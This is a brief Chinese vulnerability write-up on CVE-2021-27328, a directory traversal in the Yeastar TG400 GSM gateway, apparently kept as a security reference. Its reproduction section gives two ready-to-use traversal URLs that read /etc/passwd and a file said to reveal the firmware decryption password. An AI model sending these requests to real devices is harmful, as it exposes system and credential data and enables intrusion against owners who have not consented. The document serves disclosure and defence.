# 朗视 TG400 GSM 网关目录遍历 CVE-2021-27328

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

朗视 TG400 GSM 网关存在目录遍历 ，攻击者可以通过漏洞获取敏感信息

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

朗视 TG400 GSM 网关

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

暂无FOFA语句及固件设备复现

```
获取固件解密密码
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect
/etc/passwd：
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd
```

### 参考文章 <a href="#can-kao-wen-zhang" id="can-kao-wen-zhang"></a>

<https://github.com/SQSamir/CVE-2021-27328>